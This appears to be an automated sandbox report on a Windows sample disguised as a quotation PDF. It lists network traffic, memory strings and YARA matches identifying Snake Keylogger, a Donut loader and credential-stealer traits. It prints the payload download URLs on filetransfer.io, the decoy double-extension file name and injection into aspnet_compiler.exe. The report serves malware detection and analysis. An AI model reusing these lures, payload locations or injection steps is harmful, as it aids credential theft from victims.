Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49717 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49721 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49714 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /data-package/MlZtCPkK/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /storage/download/LuTcDMs7R8e5 HTTP/1.1Host: s20.filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /data-package/MlZtCPkK/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: filetransfer.io
Source: global traffic	DNS traffic detected: DNS query: s20.filetransfer.io
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001CA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00113000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00238000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00226000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001F1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001DE000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: aspnet_compiler.exe, 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2656248989.000001AE10009000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D5A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filetransfer.io
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D5A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filetransfer.io/data-package/MlZtCPkK/download
Source: aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001CA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00238000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00226000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001F1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001DE000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00132000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D5A1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D61A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filetransfer.io
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D61A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filetransfer.io/data-package/MlZtCPkK/download
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D7B9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922078507.0000017A0BDC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D7B9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922078507.0000017A0BDC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D7B9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922078507.0000017A0BDC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001CA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00113000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00238000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00226000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001F1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00161000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001DE000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: aspnet_compiler.exe, 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00113000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2656248989.000001AE10009000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE001B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00113000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33p
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D64B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s20.filetransfer.io
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D64B000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D647000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s20.filetransfer.io/storage/download/LuTcDMs7R8e5
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D7B9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922078507.0000017A0BDC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D6A4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D7B9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922078507.0000017A0BDC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D7B9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922078507.0000017A0BDC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49709 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.1ae100100e8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.aspnet_compiler.exe.1ae100100e8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.aspnet_compiler.exe.1ae100100e8.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.1ae100100e8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.1ae100100e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.aspnet_compiler.exe.1ae100100e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.aspnet_compiler.exe.1ae100100e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.1ae100100e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.QUOTATION_OCTQTRA071244#U00faPDF.scr.exe.17a1d5c9648.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000005.00000002.2656855245.000001AE692A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000005.00000002.2656248989.000001AE10009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.2656248989.000001AE10009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1922304917.0000017A0D856000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 7848, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 7848, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF887AF1368	0_2_00007FF887AF1368
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF887B0E180	0_2_00007FF887B0E180
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF887CD0280	0_2_00007FF887CD0280
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF887CD01FD	0_2_00007FF887CD01FD
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF887CD13E0	0_2_00007FF887CD13E0
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF887CD12F4	0_2_00007FF887CD12F4
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF887CD0210	0_2_00007FF887CD0210
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF887CD11D1	0_2_00007FF887CD11D1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_000001AE692C2B9C	5_2_000001AE692C2B9C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_000001AE692C2F78	5_2_000001AE692C2F78
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_000001AE692C3E5C	5_2_000001AE692C3E5C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_000001AE692C6654	5_2_000001AE692C6654
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_000001AE692C33A8	5_2_000001AE692C33A8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_000001AE692C1CC0	5_2_000001AE692C1CC0

Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Static PE information: No import functions for PE file found

Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1934310097.0000017A26290000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_OCTQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_OCTQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTmmvyvqzioy.dll" vs QUOTATION_OCTQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D5C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_OCTQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000000.1408011353.0000017A0B81C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameZflljac.exe: vs QUOTATION_OCTQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D92A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_OCTQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1933620032.0000017A260A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTmmvyvqzioy.dll" vs QUOTATION_OCTQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D9E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_OCTQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1930706424.0000017A1D7B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_OCTQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922078507.0000017A0BDC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_OCTQTRA071244#U00faPDF.scr.exe
Source: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Binary or memory string: OriginalFilenameZflljac.exe: vs QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.aspnet_compiler.exe.1ae6ada0000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.aspnet_compiler.exe.1ae100100e8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.aspnet_compiler.exe.1ae100100e8.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.aspnet_compiler.exe.1ae100100e8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.aspnet_compiler.exe.1ae100100e8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
